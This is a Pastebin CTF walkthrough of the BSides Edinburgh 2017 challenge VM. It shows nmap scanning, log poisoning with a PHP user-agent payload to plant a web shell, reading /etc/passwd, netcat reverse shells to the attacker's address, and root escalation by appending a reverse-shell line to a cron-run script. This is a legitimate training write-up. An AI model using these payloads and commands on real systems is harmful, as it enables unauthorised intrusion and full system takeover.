Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- BSides Edinburgh 2017 CTF Walkthrough - https://maze.pentest-challenge.co.uk/ - DigiP
- Currently scanning: 192.168.7.0/16 | Screen View: Unique Hosts
- 277 Captured ARP Req/Rep packets, from 4 hosts. Total size: 16620
- _____________________________________________________________________________
- IP At MAC Address Count Len MAC Vendor / Hostname
- -----------------------------------------------------------------------------
- 192.168.1.89 08:00:27:31:b6:3a 4 240 PCS Systemtechnik GmbH
- root@kali:~# nmap -sC -sV -T5 -v -p- --open -Pn --script vuln 192.168.1.89
- PORT STATE SERVICE VERSION
- 80/tcp open http Apache httpd 2.4.10 ((Debian))
- |_http-csrf: Couldn't find any CSRF vulnerabilities.
- |_http-dombased-xss: Couldn't find any DOM based XSS.
- | http-enum:
- | /manager/: Possible admin folder
- | /test.html: Test page
- | /test.php: Test page
- | /robots.txt: Robots file
- |_ /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
- |_http-server-header: Apache/2.4.10 (Debian)
- | http-slowloris-check:
- | VULNERABLE:
- | Slowloris DOS attack
- | State: LIKELY VULNERABLE
- | IDs: CVE:CVE-2007-6750
- | Slowloris tries to keep many connections to the target web server open and hold
- | them open as long as possible. It accomplishes this by opening connections to
- | the target web server and sending a partial request. By doing so, it starves
- | the http server's resources causing Denial Of Service.
- |
- | Disclosure date: 2009-09-17
- | References:
- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
- |_ http://ha.ckers.org/slowloris/
- |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
- MAC Address: 08:00:27:31:B6:3A (Oracle VirtualBox virtual NIC)
- /test.php has an intesting message.
- "Access Log (Cleared every 5 minutes):"
- Lets try storing some PHP. The home page, reads our user agent. We add the following as our user agent,
- <?php system("ls -lashR /") ?>
- then visit /test.php
- As suspected, we get a listing of all the files on the system (that the current user can read).
- We find logs in http://192.168.1.89/9didkaskdhjdfh44/log.txt that contain our php code from our user agent.
- We put the following in, to create our php payload in /uploads
- curl -v --user-agent '<?php system($_GET["cmd"]) ?>' http://192.168.1.89/
- /log.txt output:
- 192.168.1.66:<?php system("cp /var/www/html/9didkaskdhjdfh44/log.txt /var/www/html/uploads/foo.php") ?><br />192.168.1.66:<?php system($_GET["cmd"]) ?><br />
- Then navigate to test.php, and then /uploads/foo.php
- We can now send commands to this page without playing with our user agent.
- view-source:http://192.168.1.89/uploads/foo.php?cmd=cat%20/etc/passwd
- (Edit: I copied foo.php to shell2.php as first time around, I forgot about the logs copying, and it ended up wiping it out somehow with a blank file)
- root:x:0:0:root:/root:/bin/bash
- daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
- bin:x:2:2:bin:/bin:/usr/sbin/nologin
- sys:x:3:3:sys:/dev:/usr/sbin/nologin
- sync:x:4:65534:sync:/bin:/bin/sync
- games:x:5:60:games:/usr/games:/usr/sbin/nologin
- man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
- lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
- mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
- news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
- uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
- proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
- www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
- backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
- list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
- irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
- gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
- nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
- systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
- systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
- systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
- systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
- Debian-exim:x:104:109::/var/spool/exim4:/bin/false
- messagebus:x:105:110::/var/run/dbus:/bin/false
- statd:x:106:65534::/var/lib/nfs:/bin/false
- ctfuser:x:1000:1000:ctfuser,,,:/home/ctfuser:/bin/bash
- mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
- sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
- r00t::0:0:0wned:/home/r00t:/bin/sh
- r00t::0:0:0wned:/home/r00t:/bin/sh
- There is an odd user(s) in /etc/passwd as "r00t" that is zeros, not o's
- root:x:0:
- daemon:x:1:
- bin:x:2:
- sys:x:3:
- adm:x:4:
- tty:x:5:
- disk:x:6:
- lp:x:7:
- mail:x:8:
- news:x:9:
- uucp:x:10:
- man:x:12:
- proxy:x:13:
- kmem:x:15:
- dialout:x:20:
- fax:x:21:
- voice:x:22:
- cdrom:x:24:ctfuser
- floppy:x:25:ctfuser
- tape:x:26:
- sudo:x:27:
- audio:x:29:ctfuser
- dip:x:30:ctfuser
- www-data:x:33:
- backup:x:34:
- operator:x:37:
- list:x:38:
- irc:x:39:
- src:x:40:
- gnats:x:41:
- shadow:x:42:
- utmp:x:43:
- video:x:44:ctfuser
- sasl:x:45:
- plugdev:x:46:ctfuser
- staff:x:50:
- games:x:60:
- users:x:100:
- nogroup:x:65534:
- input:x:101:
- systemd-journal:x:102:
- systemd-timesync:x:103:
- systemd-network:x:104:
- systemd-resolve:x:105:
- systemd-bus-proxy:x:106:
- crontab:x:107:
- netdev:x:108:ctfuser
- Debian-exim:x:109:
- messagebus:x:110:
- mlocate:x:111:
- ssh:x:112:
- ctfuser:x:1000:
- ssl-cert:x:113:
- mysql:x:114:
- we start a reverse shell with /bin/nc to our machine.
- We issue:
- cat /etc/issue;cat /etc/*ele*;uname -a
- The IP address assigned to the VM is \4{eth0}. Have fun!
- ██████╗ ███████╗███╗ ██╗████████╗███████╗███████╗████████╗
- ██╔══██╗██╔════╝████╗ ██║╚══██╔══╝██╔════╝██╔════╝╚══██╔══╝
- ██████╔╝█████╗ ██╔██╗ ██║ ██║ █████╗ ███████╗ ██║
- ██╔═══╝ ██╔══╝ ██║╚██╗██║ ██║ ██╔══╝ ╚════██║ ██║
- ██║ ███████╗██║ ╚████║ ██║ ███████╗███████║ ██║
- ╚═╝ ╚══════╝╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚══════╝ ╚═╝
- ██████╗████████╗███████╗
- ██╔════╝╚══██╔══╝██╔════╝
- ██║ ██║ █████╗
- ██║ ██║ ██╔══╝
- ╚██████╗ ██║ ██║
- ╚═════╝ ╚═╝ ╚═╝
- ██████╗ ██████╗ ██╗███████╗
- ╚════██╗██╔═████╗███║╚════██║
- █████╔╝██║██╔██║╚██║ ██╔╝
- ██╔═══╝ ████╔╝██║ ██║ ██╔╝
- ███████╗╚██████╔╝ ██║ ██║
- ╚══════╝ ╚═════╝ ╚═╝ ╚═╝
- The IP address assigned to the VM is \4{eth0}. Have fun!
- PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
- NAME="Debian GNU/Linux"
- VERSION_ID="8"
- VERSION="8 (jessie)"
- ID=debian
- HOME_URL="http://www.debian.org/"
- SUPPORT_URL="http://www.debian.org/support"
- BUG_REPORT_URL="https://bugs.debian.org/"
- Linux ctf 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1 (2016-12-30) x86_64 GNU/Linux
- I check netstat -antplu while in
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
- tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
- tcp 0 0 192.168.1.89:36495 192.168.1.66:443 ESTABLISHED 19102/sh
- tcp6 0 0 ::1:25 :::* LISTEN -
- tcp6 0 0 :::80 :::* LISTEN -
- tcp6 1 0 192.168.1.89:80 192.168.1.66:50218 CLOSE_WAIT -
- udp 0 0 0.0.0.0:68 0.0.0.0:* -
- udp 0 0 0.0.0.0:1203 0.0.0.0:* -
- udp6 0 0 :::45629 :::* -
- Lets get a proper tty
- python -c 'import pty; pty.spawn("/bin/sh")'
- www-data@ctf:/home/ctfuser$ cat clearlog.sh
- cat clearlog.sh
- #!/bin/sh
- echo '' > /var/www/html/9didkaskdhjdfh44/log.txt
- www-data@ctf:/home/ctfuser$
- We find the file that looks to be clearing the user agents from the log.txt file. If we can write to this file, we may be able to elevate to root.
- So far we can't write to the ctfuser file, so I looked for some other scripts with bad perms, but none found.
- www-data@ctf:/home/ctfuser$ find / ! -ls 2>/dev/null | grep "\.sh$" | grep rwxrwxrwx
- 5430 0 lrwxrwxrwx 1 root root 21 Feb 2 14:40 /etc/rcS.d/S17bootmisc.sh -> ../init.d/bootmisc.sh
- 5372 0 lrwxrwxrwx 1 root root 21 Jan 28 03:20 /etc/rcS.d/S09mountall.sh -> ../init.d/mountall.sh
- 5338 0 lrwxrwxrwx 1 root root 32 Jan 28 03:20 /etc/rcS.d/S08checkroot-bootclean.sh -> ../init.d/checkroot-bootclean.sh
- 5481 0 lrwxrwxrwx 1 root root 20 Jan 28 03:20 /etc/rcS.d/S05hwclock.sh -> ../init.d/hwclock.sh
- 5368 0 lrwxrwxrwx 1 root root 20 Jan 28 03:20 /etc/rcS.d/S07checkfs.sh -> ../init.d/checkfs.sh
- 5278 0 lrwxrwxrwx 1 root root 24 Jan 28 03:19 /etc/rcS.d/S01mountkernfs.sh -> ../init.d/mountkernfs.sh
- 5376 0 lrwxrwxrwx 1 root root 31 Jan 28 03:20 /etc/rcS.d/S10mountall-bootclean.sh -> ../init.d/mountall-bootclean.sh
- 5429 0 lrwxrwxrwx 1 root root 31 Feb 2 14:40 /etc/rcS.d/S14mountnfs-bootclean.sh -> ../init.d/mountnfs-bootclean.sh
- 5332 0 lrwxrwxrwx 1 root root 21 Jan 28 03:19 /etc/rcS.d/S01hostname.sh -> ../init.d/hostname.sh
- 5336 0 lrwxrwxrwx 1 root root 22 Jan 28 03:20 /etc/rcS.d/S06checkroot.sh -> ../init.d/checkroot.sh
- 5334 0 lrwxrwxrwx 1 root root 26 Jan 28 03:20 /etc/rcS.d/S04mountdevsubfs.sh -> ../init.d/mountdevsubfs.sh
- 5428 0 lrwxrwxrwx 1 root root 21 Feb 2 14:40 /etc/rcS.d/S13mountnfs.sh -> ../init.d/mountnfs.sh
- 5442 0 lrwxrwxrwx 1 root root 22 Jan 28 03:37 /etc/rc6.d/K05umountnfs.sh -> ../init.d/umountnfs.sh
- 5480 0 lrwxrwxrwx 1 root root 20 Jan 28 03:37 /etc/rc6.d/K07hwclock.sh -> ../init.d/hwclock.sh
- 5441 0 lrwxrwxrwx 1 root root 22 Jan 28 03:37 /etc/rc0.d/K05umountnfs.sh -> ../init.d/umountnfs.sh
- 5478 0 lrwxrwxrwx 1 root root 20 Jan 28 03:37 /etc/rc0.d/K07hwclock.sh -> ../init.d/hwclock.sh
- echo $PATH
- /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- www-data@ctf:/var/www/html/uploads$ env
- env
- APACHE_PID_FILE=/var/run/apache2/apache2.pid
- APACHE_RUN_USER=www-data
- APACHE_LOG_DIR=/var/log/apache2
- PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- PWD=/var/www/html/uploads
- APACHE_RUN_GROUP=www-data
- LANG=C
- SHLVL=1
- APACHE_LOCK_DIR=/var/lock/apache2
- APACHE_RUN_DIR=/var/run/apache2
- _=/usr/bin/env
- OLDPWD=/usr/share/gcc-4.9
- www-data@ctf:/var/www/html/uploads$
- find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
- -rwxrwxrwx 1 root root 26597 Apr 4 11:02 /var/www/html/pentest_logo.jpg
- -rwxrwxrwx 1 root root 4301 Apr 4 11:02 /var/www/html/minimal.css
- -rwxrwxrwx 1 root root 1667 Apr 5 17:26 /var/www/html/index.php
- -rwxrwxrwx 1 root root 35 Apr 6 13:41 /var/www/html/robots.txt
- www-data@ctf:/var/www/html$
- not looking like any of these will be useful. index.php is owned by root, but will always execute as www-data unless called specifically by root. We'd need a root cron to run it for us, where we could then inject code to pop a shell as root, but no cron jobs to execute this file as root exist.
- Lost my shell at some point, fat fingered something probably.
- 192.168.1.89/uploads/shell2.php?cmd=nc 192.168.1.66 443 -e /bin/sh
- python -c 'import pty; pty.spawn("/bin/sh")';/bin/bash
- After a day of playing, looking for a hole or priv escalation, I missed captain obvious with regard to ctfuser.
- su ctfuser
- password? ctfuser
- :( wah wah wah
- su ctfuser
- su ctfuser
- Password: ctfuser
- ctfuser@ctf:/var/www/html/uploads$ id
- id
- uid=1000(ctfuser) gid=1000(ctfuser) groups=1000(ctfuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
- ctfuser@ctf:/var/www/html/uploads$ sudo -l
- sudo -l
- [sudo] password for ctfuser: ctfuser
- Sorry, user ctfuser may not run sudo on ctf.
- You have new mail in /var/mail/ctfuser
- ctfuser@ctf:/var/www/html/uploads$
- interesting info in /var/mail/ctfuser
- Subject: Cron <root@ctf> /root/scripts/rangen.sh
- we start a local listener for nc -nlvp 4444 and then:
- echo -e 'nc -nv 192.168.1.66 4444 -e /bin/bash' >> clearlog.sh
- This script, if it's what I think it is, will run every 5 minutes, as stated on the test.php page we used to gain our www-data shell.
- If root starts this process, we should get a reverse shell as root.
- 5 minutes later, and we have root!
- python -c 'import pty; pty.spawn("/bin/sh")'
- # /bin/bash
- /bin/bash
- root@ctf:~# cd /root
- cd /root
- root@ctf:~# ls -la
- ls -la
- total 48
- drwx------ 2 root root 4096 Apr 6 12:57 .
- drwxr-xr-x 22 root root 4096 Jan 28 03:20 ..
- -rw------- 1 root root 183 Apr 6 13:55 .bash_history
- -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
- -r-x------ 1 root root 8096 Feb 24 21:32 flag-gen
- ---------- 1 root root 93 Apr 6 13:55 flag.txt
- -rw------- 1 root root 485 Feb 2 14:28 .mysql_history
- -rw------- 1 root root 27 Apr 6 13:55 .nano_history
- -rw-r--r-- 1 root root 140 Nov 19 2007 .profile
- ---------- 1 root root 451 Feb 2 13:43 public_key.pem
- -rw-r--r-- 1 root root 66 Jan 30 17:28 .selected_editor
- root@ctf:~# cat flag.txt
- cat flag.txt
- Please run the flag-gen binary in the /root/ folder to generate your unique flag. Well Done!
- root@ctf:~# ./flag-gen
- ./flag-gen
- Please supply your name as an argument.
- root@ctf:~# ./flag-gen xxDigiPxx
- ./flag-gen xxDigiPxx
- gAUfvCE50nYnABpAPClJtYdhQaLqB3n0oIb/pmaRxmOHm/8JM9nDPhPJrOUnnzUcHfHR5ewAIPGB
- EGVjsvPd7YYG9Do16xyTNbP5tfENe50OA7av4kkHUvYOhVgjQfn+RcCYJDUAj3xkA5nwg1DnIBjP
- WQcseAgMxnaFE50YJYEQAolWalanygEyNJUp/L2CQODR/KSgdacWBSjPL+zdCtbF5YPjsVHvlijX
- WJcNuIs7wlHysMsUadMahRffgSYhv0+gUs9VVT0CB7/2kqlg7CTivS9btjvXicrAN4Fv2Ma2l39I
- 7SWX6Yt3I/7U4VJXNoVSYUeBwrTTiCKu2dqgQA==
- root@ctf:~#
- During this CTF, I had tried way too many things, looking for various exploits for priv escalation and came up short. At the end of the day,
- the simplest of things came to bite me in the ass, as using the username as a password was something I should have tried as soon as I had
- gained my first tty session. Just goes to show that somethings it's the little things we neglect that have the biggest impact. - DigiP
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement